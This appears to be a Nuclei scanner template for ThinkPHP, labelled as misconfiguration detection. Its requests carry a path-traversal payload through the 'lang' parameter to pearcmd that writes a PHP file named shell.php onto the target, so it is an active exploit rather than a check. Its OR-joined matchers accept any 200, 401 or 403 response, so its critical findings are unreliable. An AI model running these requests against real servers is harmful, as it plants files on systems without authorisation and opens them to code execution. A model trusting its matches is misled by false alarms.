id: thinkphp-misconfig
info:
  name: ThinkPHP Misconfiguration Detection
  author: pwn
  severity: critical
  description: Detects exposed ThinkPHP instances with accessible sensitive endpoints, potentially vulnerable to RCE.
  tags: thinkphp, misconfiguration, rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/%3C%3F=phpinfo%28%29%3F%3E+shell.php"
      - "{{BaseURL}}:8080/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/%3C%3F=phpinfo%28%29%3F%3E+shell.php"
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "ThinkPHP"
          - "phpinfo"
        part: body
        condition: or
        case-insensitive: true
      - type: word
        words:
          - "ThinkPHP"
        part: body
        condition: or
        case-insensitive: true
      - type: status
        status:
          - 403
          - 401
    extractors:
      - type: regex
        name: matched_path
        part: request
        regex:
          - "https?://[^/]+(/.*)"
        group: 1
